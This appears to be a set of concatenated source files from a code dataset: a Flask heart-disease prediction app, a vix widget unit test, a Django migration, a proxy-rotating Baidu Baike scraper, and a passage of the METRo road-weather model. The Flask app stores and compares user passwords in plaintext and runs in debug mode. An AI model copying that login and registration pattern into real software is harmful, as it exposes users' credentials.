request.form['password']\r\n\r\n # Create a new connection for the current thread\r\n conn = get_db()\r\n\r\n # Create the \"users\" table if it doesn't exist\r\n conn.execute('''\r\n CREATE TABLE IF NOT EXISTS users (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n email TEXT NOT NULL,\r\n username TEXT NOT NULL,\r\n password TEXT NOT NULL\r\n )\r\n ''')\r\n\r\n # Create the \"prediction_history\" table if it doesn't exist\r\n conn.execute('''\r\n CREATE TABLE IF NOT EXISTS prediction_history (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n user_id INTEGER NOT NULL,\r\n prediction_time TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\r\n Smoking TEXT,\r\n AlcoholDrinking TEXT,\r\n Stroke TEXT,\r\n DiffWalking TEXT,\r\n Sex TEXT,\r\n AgeCategory TEXT,\r\n Race TEXT,\r\n Diabetic TEXT,\r\n PhysicalActivity TEXT,\r\n GenHealth TEXT,\r\n Asthma TEXT,\r\n KidneyDisease TEXT,\r\n SkinCancer TEXT,\r\n PhysicalHealth NUMERIC,\r\n SleepTime NUMERIC,\r\n MentalHealth NUMERIC,\r\n BMI NUMERIC,\r\n predicted_result NUMERIC,\r\n FOREIGN KEY (user_id) REFERENCES users (id)\r\n )\r\n ''')\r\n\r\n # Check if the email already exists in the database\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT * FROM users WHERE email=?', (email,))\r\n existing_user = cursor.fetchone()\r\n cursor.close()\r\n\r\n if existing_user:\r\n # Email already exists in the database\r\n flash('Registration failed. Email already in use.', 'error')\r\n conn.close() \r\n return redirect(url_for('register'))\r\n\r\n # Insert user data into the database\r\n conn.execute('INSERT INTO users (email, username, password) VALUES (?, ?, ?)', (email, username, password))\r\n conn.commit()\r\n\r\n # Close the connection\r\n conn.close()\r\n\r\n flash('User registered successfully', 'success')\r\n return redirect(url_for('index'))\r\n \r\n return render_template(\"registration.html\")\r\n\r\ndef query_user_data_from_database(user_id):\r\n # Connect to the database\r\n conn = get_db()\r\n\r\n # Perform a query to retrieve the user data based on the user_id\r\n cursor = conn.execute('SELECT * FROM users WHERE id = ?', (user_id,))\r\n user_data = cursor.fetchone()\r\n\r\n # Close the cursor and connection\r\n cursor.close()\r\n conn.close()\r\n\r\n return user_data\r\n\r\ndef get_results():\r\n # Connect to the database\r\n conn = get_db()\r\n\r\n # Get the current session ID\r\n session_id = session['id']\r\n\r\n # Create a cursor\r\n cursor = conn.cursor()\r\n\r\n # Execute a SELECT query to retrieve the rows\r\n cursor.execute('SELECT prediction_time, predicted_result FROM prediction_history WHERE user_id=?', (session_id,))\r\n\r\n # Fetch the results\r\n results = cursor.fetchall()\r\n\r\n # Close the cursor and connection\r\n cursor.close()\r\n conn.close()\r\n\r\n # Convert the results to a list\r\n results_list = list(results)\r\n\r\n # Return the results\r\n return results_list\r\n\r\n\r\n\r\n@app.route(\"/logout\", methods=[\"GET\", \"POST\"])\r\ndef logout():\r\n # Clear the user ID from the session\r\n session.pop('id', None)\r\n # Logout successful\r\n flash('Logout successful!', 'success')\r\n return redirect(url_for('index'))\r\n \r\n\r\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\r\ndef login():\r\n if request.method == \"POST\":\r\n email = request.form['email']\r\n password = request.form['password']\r\n\r\n # Create a new connection for the current thread\r\n conn = get_db()\r\n\r\n # Perform database operations using the connection\r\n cursor = conn.cursor()\r\n\r\n # Execute a SELECT query to retrieve the user with the given username and password\r\n cursor.execute('SELECT * FROM users WHERE email=? AND password=?', (email, password))\r\n\r\n # Fetch the first row from the result set\r\n user = cursor.fetchone()\r\n\r\n # Close the cursor and connection\r\n cursor.close()\r\n conn.close()\r\n\r\n if user:\r\n # Store the user ID in the session\r\n session['id'] = user[0]\r\n session['name'] = user[2] \r\n # User credentials are valid\r\n return redirect(url_for('startup'))\r\n else:\r\n # User credentials are invalid\r\n flash('Invalid username or password', 'error')\r\n return redirect(url_for('index'))\r\n\r\n return render_template(\"login.html\")\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n return render_template(\"login.html\")\r\n\r\n@app.route(\"/heart\")\r\ndef heart():\r\n return render_template(\"heart.html\")\r\n\r\n@app.route(\"/history\")\r\ndef history():\r\n results = get_results()\r\n name = session.get('name') # Get the name from the session\r\n return render_template(\"history.html\", results=results, name=name)\r\n\r\n\r\n\r\n\r\n# Define encoding mappings\r\nsmoking_mapping = {\"No\": 0, \"Yes\": 1}\r\nalcohol_mapping = {\"No\": 0, \"Yes\": 1}\r\nstroke_mapping = {\"No\": 0, \"Yes\": 1}\r\ndiff_walking_mapping = {\"No\": 0, \"Yes\": 1}\r\nsex_mapping = {\"Female\": 0, \"Male\": 1}\r\nage_cat_mapping = {\"55-59\": 0, \"80 or older\": 1, '65-69': 2, '75-79': 3, '40-44': 4, '70-74': 5, '60-64': 6, '50-54': 7, '45-49': 8, '18-24': 9, '35-39': 10, '30-34': 11, '25-29': 12}\r\nrace_mapping = {\"White\": 0, \"Black\": 1, \"Asian\": 2, \"American Indian/Alaskan Native\": 3, \"Other\": 4, \"Hispanic\": 5}\r\ndiabetic_mapping = {\"Yes\": 0, \"No\": 1, \"No, borderline diabetes\": 2, \"Yes (during pregnancy)\": 3}\r\nphysical_activity_mapping = {\"No\": 0, \"Yes\": 1}\r\ngen_health_mapping = {\"Very good\": 0, 'Fair': 1, 'Good': 2, 'Poor':3, 'Excellent':4}\r\nasthma_mapping = {\"No\": 0, \"Yes\": 1}\r\nkidney_disease_mapping = {\"No\": 0, \"Yes\": 1}\r\nskin_cancer_mapping = {\"No\":0, \"Yes\":1}\r\n\r\nreverse_smoking_mapping = {v: k for k, v in smoking_mapping.items()}\r\nreverse_alcohol_mapping = {v: k for k, v in alcohol_mapping.items()}\r\nreverse_stroke_mapping = {v: k for k, v in stroke_mapping.items()}\r\nreverse_diff_walking_mapping = {v: k for k, v in diff_walking_mapping.items()}\r\nreverse_sex_mapping = {v: k for k, v in sex_mapping.items()}\r\nreverse_age_cat_mapping = {v: k for k, v in age_cat_mapping.items()}\r\nreverse_race_mapping = {v: k for k, v in race_mapping.items()}\r\nreverse_diabetic_mapping = {v: k for k, v in diabetic_mapping.items()}\r\nreverse_physical_activity_mapping = {v: k for k, v in physical_activity_mapping.items()}\r\nreverse_gen_health_mapping = {v: k for k, v in gen_health_mapping.items()}\r\nreverse_asthma_mapping = {v: k for k, v in asthma_mapping.items()}\r\nreverse_kidney_disease_mapping = {v: k for k, v in kidney_disease_mapping.items()}\r\nreverse_skin_cancer_mapping = {v: k for k, v in skin_cancer_mapping.items()}\r\n\r\n@app.route(\"/predict\", methods=[\"POST\"])\r\ndef predict():\r\n \r\n # Load the scaler\r\n #scaler = joblib.load(scaler_path)\r\n \r\n # Get the form data\r\n form_data = request.form.to_dict()\r\n\r\n name = form_data[\"name\"]\r\n\r\n # Define the numerical columns used for normalization\r\n #numerical_columns = [\"PhysicalHealth\", \"SleepTime\", \"MentalHealth\", \"BMI\"]\r\n\r\n #Normalize the numerical values in form_data\r\n #normalized_data = form_data.copy() # Create a copy of the form data\r\n\r\n #input_values = []\r\n #for col in numerical_columns:\r\n # input_values.append(float(form_data[col]))\r\n\r\n #normalized_values = scaler.transform([input_values])[0]\r\n\r\n #normalized_data['PhysicalHealth'] = normalized_values[0]\r\n #normalized_data['SleepTime'] = normalized_values[1]\r\n #normalized_data['MentalHealth'] = normalized_values[2]\r\n #normalized_data['BMI'] = normalized_values[3]\r\n\r\n # Convert the form data to a list of values in the same order as your dataset\r\n new_sample = [form_data[\"Smoking\"], form_data[\"AlcoholDrinking\"], form_data[\"Stroke\"], form_data[\"DiffWalking\"],\r\n form_data[\"Sex\"], form_data[\"AgeCategory\"], form_data[\"Race\"], form_data[\"Diabetic\"],\r\n form_data[\"PhysicalActivity\"], form_data[\"GenHealth\"], form_data[\"Asthma\"],\r\n form_data[\"KidneyDisease\"], form_data[\"SkinCancer\"], float(form_data[\"PhysicalHealth\"]),\r\n float(form_data[\"SleepTime\"]), float(form_data[\"MentalHealth\"]), float(form_data[\"BMI\"])]\r\n \r\n new_sample = [float(x) for x in new_sample]\r\n\r\n # Validate the input values\r\n for i, col in enumerate(numerical_columns):\r\n val = new_sample[i+len(categorical_columns)]\r\n if not column_ranges[col][0] <= val <= column_ranges[col][1]:\r\n return render_template(\"result.html\", error=f\"Invalid value {val} for column {col}\")\r\n\r\n # Convert the list to a numpy array\r\n new_sample = np.array([new_sample])\r\n\r\n # Impute the missing values using KNN\r\n imputer = KNNImputer(n_neighbors=3)\r\n new_sample[:, :13] = imputer.fit_transform(new_sample[:, :13])\r\n\r\n # Scale the numerical features to the range [0,1]\r\n scaler = MinMaxScaler()\r\n new_sample[:, 13:17] = scaler.fit_transform(new_sample[:, 13:17])\r\n\r\n # Concatenate the imputed and normalized columns 0 to 13 with the normalized columns 14 to 16\r\n new_sample = np.concatenate([new_sample[:, :13], new_sample[:, 13:17]], axis=1)\r\n\r\n # Make the prediction\r\n prediction = model.predict(new_sample)\r\n\r\n # Print the predicted probability of heart disease in percentage\r\n predicted_prob = round(prediction[0][0]*100, 2)\r\n #decoded data\r\n decoded_data = [\r\n reverse_smoking_mapping[int(new_sample[0][0])],\r\n reverse_alcohol_mapping[int(new_sample[0][1])],\r\n reverse_stroke_mapping[int(new_sample[0][2])],\r\n reverse_diff_walking_mapping[int(new_sample[0][3])],\r\n reverse_sex_mapping[int(new_sample[0][4])],\r\n reverse_age_cat_mapping[int(new_sample[0][5])],\r\n reverse_race_mapping[int(new_sample[0][6])],\r\n reverse_diabetic_mapping[int(new_sample[0][7])],\r\n reverse_physical_activity_mapping[int(new_sample[0][8])],\r\n reverse_gen_health_mapping[int(new_sample[0][9])],\r\n reverse_asthma_mapping[int(new_sample[0][10])],\r\n reverse_kidney_disease_mapping[int(new_sample[0][11])],\r\n reverse_skin_cancer_mapping[int(new_sample[0][12])],\r\n float(form_data[\"PhysicalHealth\"]),\r\n float(form_data[\"SleepTime\"]),\r\n float(form_data[\"MentalHealth\"]), \r\n float(form_data[\"BMI\"])\r\n ]\r\n\r\n # Store the user data in the database\r\n store_user_data_in_database(decoded_data, predicted_prob)\r\n\r\n return render_template(\"result.html\", name=name, predicted_prob=predicted_prob)\r\n\r\n\r\ndef store_user_data_in_database(user_data, predicted_prob):\r\n # Create a new connection for the current thread\r\n conn = get_db()\r\n\r\n # Retrieve the user ID from the session\r\n user_id = session.get('id')\r\n\r\n # Insert user data into the prediction_history table\r\n conn.execute('''\r\n INSERT INTO prediction_history (user_id, prediction_time, Smoking, AlcoholDrinking, Stroke, DiffWalking, Sex, AgeCategory,\r\n Race, Diabetic, PhysicalActivity, GenHealth, Asthma, KidneyDisease, SkinCancer, PhysicalHealth, SleepTime,\r\n MentalHealth, BMI, predicted_result)\r\n VALUES (?, CURRENT_TIMESTAMP, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\r\n ''', (user_id, user_data[0], user_data[1], user_data[2], user_data[3], user_data[4], user_data[5], user_data[6],\r\n user_data[7], user_data[8], user_data[9], user_data[10], user_data[11], user_data[12], user_data[13],\r\n user_data[14], user_data[15], user_data[16], predicted_prob))\r\n\r\n # Commit the changes\r\n conn.commit()\r\n\r\n # Close the connection\r\n conn.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"SJWONG27/HealthOracle","sub_path":"ML Project/Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":14273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"23165364839","text":"import unittest\nfrom vixtk import test, gui, core\nfrom vix.widgets import CommandBar\nfrom vix import flags\n\nclass CommandBarTest(unittest.TestCase):\n def setUp(self):\n self.screen = test.VTextScreen((100,40))\n self.app = gui.VApplication([], screen=self.screen)\n\n def tearDown(self):\n del self.screen\n self.app.exit()\n core.VCoreApplication.vApp=None\n del self.app\n\n def testBasicCommandBar(self):\n bar = CommandBar(parent=None)\n bar.setGeometry((0,0,100,1))\n bar.show()\n bar.setMode(flags.INSERT_MODE)\n self.app.processEvents()\n self.assertEqual(self.screen.stringAt(0,0,12), \"-- INSERT --\")\n bar.setMode(flags.COMMAND_MODE)\n self.app.processEvents()\n self.assertEqual(self.screen.stringAt(0,0,12), \" \")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"maiconpl/vix","sub_path":"tests/vix/widgets/test_CommandBar.py","file_name":"test_CommandBar.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"84"} +{"seq_id":"37905362490","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('backend', '0003_remove_event_creator_id'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Partier',\n fields=[\n\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('profile_image', models.FileField(upload_to='')),\n ('litness', models.DecimalField(decimal_places=5, max_digits=13, null=True)),\n ('events_invited', models.ManyToManyField(to='backend.Event', related_name='events')),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"whatslit/backend","sub_path":"backend/migrations/0004_partier.py","file_name":"0004_partier.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"40443135472","text":"__author__ = 'huafeng'\n#encoding:utf-8\n\nimport os\nimport re\nimport time\nimport gevent\nimport codecs\nimport random\nimport urllib2\nimport simplejson\nimport gevent.monkey\nfrom bs4 import BeautifulSoup\nfrom math import ceil\ngevent.monkey.patch_all()\n\nPATH = os.path.dirname(__file__)\n\nclass BaiKe(object):\n def __init__(self):\n\n self.timeout_url_list = []\n\n def write_timeout_url(self, url_list):\n filename = os.path.join(PATH, 'sys', 'timeout_urls')\n with codecs.open(filename, mode='a', encoding='utf-8') as f:\n url_list = [item+'\\n' for item in url_list]\n f.writelines(url_list)\n\n def parse_html(self, url,filecount,proxy):\n\n content_json_dict = {}\n http_proxy = 'http://%s'%proxy\n proxy_hanlder = urllib2.ProxyHandler({'http':http_proxy})\n opener = urllib2.build_opener(proxy_hanlder)\n urllib2.install_opener(opener)\n try:\n html = urllib2.urlopen(url).read()\n except:\n self.timeout_url_list.append(url)\n if len(self.timeout_url_list) > 500:\n self.write_timeout_url(self.timeout_url_list)\n self.timeout_url_list[:] = []\n return\n\n soup = BeautifulSoup(html)\n header_str = soup.find('div', class_='lemmaTitleH1')\n if not header_str:\n self.timeout_url_list.append(url)\n if len(self.timeout_url_list) > 500:\n self.write_timeout_url(self.timeout_url_list)\n self.timeout_url_list[:] = []\n # print 'url not match pattern:%s'%url\n return\n content_json_dict['header'] = header_str.text\n content_json_dict['url'] = url\n para_level_list = soup.find_all('div', class_='para')\n para_str_list =[para.text for para in para_level_list]\n content_str = \"\".join(para_str_list)\n content_json_dict['content'] = content_str\n json_obj = simplejson.dumps(content_json_dict)\n filename = os.path.join(PATH, 'out', filecount)\n with codecs.open('%s'%filename, mode='wb', encoding='utf-8')as f:\n f.write(json_obj)\n # parse_html()\n\n def read_with_proxy(self, section_count):\n filename = os.path.join(PATH, 'sys', 'xici_proxy')\n with open(filename) as f:\n proxy_ip_list = f.readlines()\n proxy_ip_list = [item.strip() for item in proxy_ip_list]\n proxy_count = len(proxy_ip_list)\n # start = time.time()\n threads = []\n url_pattern = \"http://baike.baidu.com/view/%s.htm\"\n\n thread_count = 200\n threads_per_proxy = int(ceil(thread_count/float(proxy_count)))\n\n for i in range(1+thread_count*section_count, thread_count*(section_count+1)+1):\n url = url_pattern%str(i)\n proxy_point = (i-thread_count*section_count)/threads_per_proxy\n ip_port = proxy_ip_list[proxy_point]\n threads.append(gevent.spawn(self.parse_html, url, str(i), ip_port))\n gevent.joinall(threads,timeout=90)\n # end = time.time()\n # print \"elapsed time : %d\" %(end-start)\n\n def request_timeout_url(self, section_count, timeout_url_list):\n filename = os.path.join(PATH, 'sys', 'xici_proxy')\n with open(filename) as f:\n proxy_ip_list = f.readlines()\n proxy_ip_list = [item.strip() for item in proxy_ip_list]\n proxy_count = len(proxy_ip_list)\n threads = []\n # url_pattern = \"http://baike.baidu.com/view/%s.htm\"\n\n thread_count = 100\n threads_per_proxy = int(ceil(thread_count/float(proxy_count)))\n\n for i in range(thread_count*section_count, thread_count*(section_count+1)):\n # url = url_pattern%str(i)\n try:\n url = timeout_url_list[i]\n except:\n continue\n proxy_point = (i-thread_count*section_count)/threads_per_proxy\n ip_port = proxy_ip_list[proxy_point]\n threads.append(gevent.spawn(self.parse_html, url, str(i), ip_port))\n gevent.joinall(threads,timeout=90)\n\n def baike_content(self):\n url_count = 10000000\n threads_count = 200\n n = url_count/threads_count\n for i in range(n):\n self.read_with_proxy(i)\n time.sleep(random.randint(2,5))\n filename = os.path.join(PATH, 'sys', 'timeout_urls')\n for recheck_count in range(4):\n\n with open(filename) as f:\n timeout_url_list = f.readlines()\n\n temp_timeout_url = os.path.join(PATH, 'sys', 'temp_timeout_urls')\n with codecs.open(temp_timeout_url, mode='wb', encoding='utf-8') as wf:\n wf.writelines(timeout_url_list)\n #清空timeout_urls文件\n with open(filename, mode='wb')as rf:\n pass\n\n timeout_url_count = len(timeout_url_list)\n timeout_threads_count = 100\n m = timeout_url_count/timeout_threads_count\n for j in range(m):\n self.request_timeout_url(j, timeout_url_list)\nif __name__ == \"__main__\":\n baike = BaiKe()\n baike.baike_content()","repo_name":"wanghuafeng/e-business","sub_path":"baidu/baike.py","file_name":"baike.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"84"} +{"seq_id":"11757281973","text":"from metro_module import Metro_module\n\nimport string\nimport time\nimport numpy\n\nimport metro_logger\nimport metro_config\nfrom toolbox import metro_util\nfrom toolbox import metro_date\nfrom toolbox import metro_constant\nfrom data_module import metro_data_collection_output\nfrom data_module import metro_data\nfrom data_module import metro_infdata\n\n_ = metro_util.init_translation('metro_model')\n\n# To call the C function.\nfrom model import macadam\n\nclass Metro_model(Metro_module):\n\n def get_receive_type( self ):\n return Metro_module.DATATYPE_DATA_IN\n\n def get_send_type( self ):\n return Metro_module.DATATYPE_DATA_OUT\n\n def start( self ):\n Metro_module.start(self)\n\n pForecast = self.get_infdata_reference('FORECAST')\n forecast_data = pForecast.get_data_collection()\n pObservation = self.get_infdata_reference('OBSERVATION')\n observation_data = pObservation.get_data_collection()\n pStation = self.get_infdata_reference('STATION')\n station_data = pStation.get_data()\n\n if metro_config.get_value('T_BYPASS_CORE') == False:\n\n self.__send_data_to_metro_core(forecast_data,\n observation_data,\n station_data )\n \n roadcast_data = self.__create_roadcast_collection(forecast_data,\n observation_data,\n station_data)\n else:\n roadcast_data = None\n metro_logger.print_message(\n metro_logger.LOGGER_MSG_INFORMATIVE,\n _(\"Bypassing METRo core, roadcast not created.\"))\n\n pForecast.set_data_collection(forecast_data)\n pObservation.set_data_collection(observation_data)\n pStation.set_data(station_data)\n\n # creer et ajouter infdata\n # Creation and adding infdata\n infdata_roadcast = metro_infdata.Metro_infdata(\n 'ROADCAST', metro_infdata.DATATYPE_METRO_DATA_COLLECTION)\n infdata_roadcast.set_data_collection(roadcast_data)\n self.add_infdata(infdata_roadcast)\n \n \n def stop( self ):\n Metro_module.stop(self)\n\n def __get_nb_timesteps( self, forecast ):\n wf_data = forecast.get_interpolated_data()\n npFT = wf_data.get_matrix_col('Time')\n\n return len(npFT)\n\n\n def __get_observation_lenght( self, observation ):\n obs_data = observation.get_interpolated_data()\n lTime_obs = obs_data.get_matrix_col('Time').tolist()\n return len(lTime_obs) \n\n def __get_observation_delta_t( self, observation ):\n return observation.get_attribute('DELTA_T') \n \n def __send_data_to_metro_core( self, forecast, observation, station ):\n\n wf_data = forecast.get_interpolated_data()\n ro_data = observation.get_interpolated_data()\n cs_data = station\n\n # Start time from model is the last observation\n sStart_time = metro_config.get_value('DATA_ATTRIBUTE_LAST_OBSERVATION')\n fStart_time = metro_date.parse_date_string(sStart_time)\n\n\n iModel_start_y = metro_date.get_year(fStart_time)\n sMessage = _(\"year: [%s]\") % (iModel_start_y)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n iModel_start_m = metro_date.get_month(fStart_time)\n sMessage = _(\"month: [%s]\") % (iModel_start_m)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n iModel_start_d = metro_date.get_day(fStart_time)\n sMessage = _(\"day: [%s]\") % (iModel_start_d)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n iModel_start_h = metro_date.get_hour(fStart_time)\n sMessage = _(\"hour: [%s]\") % (iModel_start_h)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n dStation_header = cs_data.get_header()\n\n # test observation\n dObservation_header = ro_data.get_header()\n lObservation_data = ro_data.get_matrix()\n sMessage = \"Observation_header=\" + str(dObservation_header)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage) \n sMessage = \"Observation_data=\" + str(lObservation_data)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n \n # test forecast\n dForecast_header = wf_data.get_header()\n lForecast_data = wf_data.get_matrix()\n\n sMessage = \"Forecast_header=\" + str(dForecast_header)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage) \n sMessage = \"Forecast_data=\" + str(lForecast_data)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n # start roadlayer MATRIX\n npLayerType = cs_data.get_matrix_col('TYPE')\n lLayerType = npLayerType.astype(numpy.int32).tolist()\n lLayerThick = cs_data.get_matrix_col('THICKNESS').tolist()\n nNbrOfLayer = len(lLayerType)\n\n sMessage = _(\"Number of layer=\") + str(nNbrOfLayer)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n # Append an empty box for the manuel mode\n lLayerType.append(0)\n lLayerThick.append(0.0)\n \n\n sMessage = _(\"roadlayer type=\") + str(lLayerType)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n sMessage = _(\"roadlayer thick=\") + str(lLayerThick)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n # end roadlayer MATRIX\n\n fTime = dStation_header['PRODUCTION_DATE']\n fTimeForecast = dForecast_header['PRODUCTION_DATE']\n sTimeZone = dStation_header['TIME_ZONE']\n sMessage = _(\"timezone=\") + sTimeZone\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n \n fIssue_time = fStart_time\n \n sMessage = _(\"issue time=\") + time.ctime(fIssue_time)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n \n wforiginal = forecast.get_original_data()\n\n ft = wforiginal.get_matrix_col('FORECAST_TIME')\n\n\n ##################################################################\n # Forecast\n # Get the interpolated values.\n wf_interpolated_data = forecast.get_interpolated_data()\n npAT = wf_interpolated_data.get_matrix_col('AT')\n lAT = npAT.tolist()\n lQP = wf_interpolated_data.get_matrix_col('QP').tolist()\n npWS = wf_interpolated_data.get_matrix_col('WS')\n lWS = npWS.tolist()\n npTD = wf_interpolated_data.get_matrix_col('TD') \n lTD = npTD.tolist()\n lAP = wf_interpolated_data.get_matrix_col('AP').tolist()\n lSF = wf_interpolated_data.get_matrix_col('SF').tolist()\n lIR = wf_interpolated_data.get_matrix_col('IR').tolist()\n npFA = wf_interpolated_data.get_matrix_col('FA')\n lFA = npFA.tolist()\n lPI = wf_interpolated_data.get_matrix_col('PI').astype(numpy.int32).tolist()\n lSC = wf_interpolated_data.get_matrix_col('SC').astype(numpy.int32).tolist()\n \n\n # Number of 30 seconds step.\n npFT = wf_interpolated_data.get_matrix_col('Time')\n nNbrTimeSteps = self.__get_nb_timesteps(forecast)\n lAH = wf_interpolated_data.get_matrix_col('AH').tolist()\n\n # Observation data ###############################################\n ro_interpolated_data = observation.get_interpolated_data()\n lAT_obs = ro_interpolated_data.get_matrix_col('AT').tolist()\n lST_obs = ro_interpolated_data.get_matrix_col('ST').tolist()\n lSST_obs = ro_interpolated_data.get_matrix_col('SST').tolist()\n lTime_obs = ro_interpolated_data.get_matrix_col('Time').tolist()\n # Deep soil value given in command line\n bDeepTemp = metro_config.get_value('DEEP_SOIL_TEMP')\n dDeepTemp = float(metro_config.get_value('DEEP_SOIL_TEMP_VALUE'))\n\n nLenObservation = self.__get_observation_lenght(observation) \n fDeltaTMetroObservation = self.__get_observation_delta_t(observation)\n \n # Concatenate the information to send it to C.\n npSWO1 = observation.get_attribute('SST_VALID_INTERPOLATED')\\\n .astype(numpy.int32)\n npSWO2 = observation.get_attribute('AT_VALID_INTERPOLATED')\\\n .astype(numpy.int32)\n npSWO3 = observation.get_attribute('TD_VALID_INTERPOLATED')\\\n .astype(numpy.int32)\n npSWO4 = observation.get_attribute('WS_VALID_INTERPOLATED')\\\n .astype(numpy.int32)\n npSWO = numpy.zeros(4*metro_constant.nNL)\n # Put all the arrays in one for the fortran code.\n for i in range(0,len(npSWO1)):\n npSWO[4*i] = npSWO1[i]\n npSWO[4*i+1] = npSWO2[i]\n npSWO[4*i+2] = npSWO3[i] \n npSWO[4*i+3] = npSWO4[i] \n lSWO = npSWO.astype(numpy.int32).tolist()\n \n bNoObs = observation.get_attribute('NO_OBS')\n \n sMessage = _( \"------------station config START---------------------\")\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n \n sShort_time_zone = metro_date.get_short_time_zone\\\n (fIssue_time,sTimeZone)\n\n sMessage = _( \"Short time zone = \") + sShort_time_zone\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n tLatlon = dStation_header['COORDINATE']\n fLat = tLatlon[0]\n fLon = tLatlon[1]\n sMessage = _( \"lat,lon: \")+ \"(\" + str(fLat) + \", \" + str(fLon) + \")\"\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n bFlat = cs_data.get_station_type()\n\n dSstDepth = cs_data.get_sst_depth()\n\n sMessage = _( \"SST sensor depth: \") + str(dSstDepth)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n sMessage = _(\"------------station config END---------------------\")\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n \n bSilent = not metro_config.get_value('INIT_LOGGER_SHELL_DISPLAY')\n\n metro_logger.print_message(metro_logger.LOGGER_MSG_EXECPRIMARY,\n _(\"Start sending data to METRo core\"))\n\n bEchec = []\n\n macadam.Do_Metro(bFlat, fLat, fLon, lLayerThick, \\\n nNbrOfLayer, lLayerType, lAT, lQP, \\\n lWS, lAP, lSF, lIR, \\\n lFA, lPI, lSC, lAT_obs, \\\n lST_obs, lSST_obs, lAH, lTime_obs, \\\n lSWO, bNoObs, fDeltaTMetroObservation, \\\n nLenObservation, nNbrTimeSteps, bSilent, \\\n dSstDepth, bDeepTemp, dDeepTemp)\n bEchec = (macadam.get_echec())[0]\n # Check if the execution of the model was a succes:\n if bEchec != 0:\n sError_message = _(\"Fatal error in METRo physical model.\") \n metro_logger.print_message(metro_logger.LOGGER_MSG_STOP,\n sError_message)\n else:\n metro_logger.print_message(metro_logger.LOGGER_MSG_EXECPRIMARY,\n _(\"End of METRo core\"))\n\n def __create_roadcast_collection( self, forecast, observation, station ):\n \n\n # Creation of the Metro_data object for the roadcast\n lStandard_items = metro_config.get_value( \\\n 'XML_ROADCAST_PREDICTION_STANDARD_ITEMS')\n lExtended_items = metro_config.get_value( \\\n 'XML_ROADCAST_PREDICTION_EXTENDED_ITEMS') \n lItems = lStandard_items # + lExtended_items\n\n #FFTODO append all lExtended_items to metrodata \n roadcast = metro_data.Metro_data(lItems)\n \n # Extraction of forecast data used to create the roadcasts.\n wf_data = forecast.get_interpolated_data()\n \n #\n # Generate the header of roadcast\n #\n\n # extraction of informations\n sRoadcast_version = \\\n metro_config.get_value('FILE_ROADCAST_CURRENT_VERSION')\n sRoadcast_station = station.get_station_name()\n fRoadcast_production_date = time.time()\n \n \n #\n # Generate the roadcast matrix of data\n #\n\n # Extraction of data used by metro_core in the computation\n iObservation_len = self.__get_observation_lenght(observation)\n fObservation_delta_t = self.__get_observation_delta_t(observation)\n iNb_timesteps = self.__get_nb_timesteps(forecast)\n\n\n # Extraction of roadcast data computed by metro_core\n lRA = (macadam.get_ra())[:iNb_timesteps]\n lSN = (macadam.get_sn())[:iNb_timesteps]\n lRC = (macadam.get_rc())[:iNb_timesteps]\n lST = (macadam.get_rt())[:iNb_timesteps]\n lFV = (macadam.get_fv())[:iNb_timesteps]\n lSF = (macadam.get_sf())[:iNb_timesteps]\n lIR = (macadam.get_ir())[:iNb_timesteps]\n lFC = (macadam.get_fc())[:iNb_timesteps]\n lFG = (macadam.get_g())[:iNb_timesteps]\n lBB = (macadam.get_bb())[:iNb_timesteps]\n lFP = (macadam.get_fp())[:iNb_timesteps]\n lSST = (macadam.get_sst())[:iNb_timesteps]\n\n if metro_config.get_value('TL') == True:\n # Temperature of levels under the ground.\n nNbrVerticalLevel = macadam.get_nbr_levels()\n lDepth = (macadam.get_depth())[:nNbrVerticalLevel]\n lTmpTL = 